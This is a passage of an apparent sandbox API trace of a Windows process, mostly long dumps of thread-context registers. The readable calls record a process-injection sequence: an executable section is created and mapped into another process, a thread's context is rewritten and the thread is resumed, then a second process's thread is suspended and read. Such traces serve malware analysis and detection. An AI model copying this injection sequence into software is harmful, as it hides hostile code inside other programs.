[38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x27e000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7567895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0172.101] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x140) returned 0x0 [0172.102] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0xd1200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0xd2000) returned 0x0 [0172.107] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0x138, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0xd1200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x6d0000, SectionOffset=0x0, ViewSize=0xde6e8*=0xd2000) returned 0x0 [0172.175] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0172.180] NtClose (Handle=0x140) returned 0x0 [0172.180] NtSetContextThread (ThreadHandle=0xb4, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x27e000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x70e707, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0172.267] NtResumeThread (in: ThreadHandle=0xb4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0172.267] NtClose (Handle=0x138) returned 0x0 [0172.267] NtClose (Handle=0xb4) returned 0x0 [0172.268] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x106c, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0xb4) returned 0x0 [0172.268] NtQueryInformationProcess (in: ProcessHandle=0xb4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0172.268] NtQueryInformationProcess (in: ProcessHandle=0xb4, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0172.268] NtReadVirtualMemory (in: ProcessHandle=0xb4, BaseAddress=0x2f9000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0172.269] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0172.312] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x1070) | out: ThreadHandle=0xdea64*=0x138) returned 0x0 [0172.312] NtSuspendThread (in: ThreadHandle=0x138, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0172.313] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0xb4, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2120000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0172.428] NtGetContextThread (in: ThreadHandle=0x138, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x4fff14, Ebx=0x2f9000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x4ffebc, Eip=0x7567895c, SegCs=0x23, EFlags=0x202, Esp=0x4ffea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, 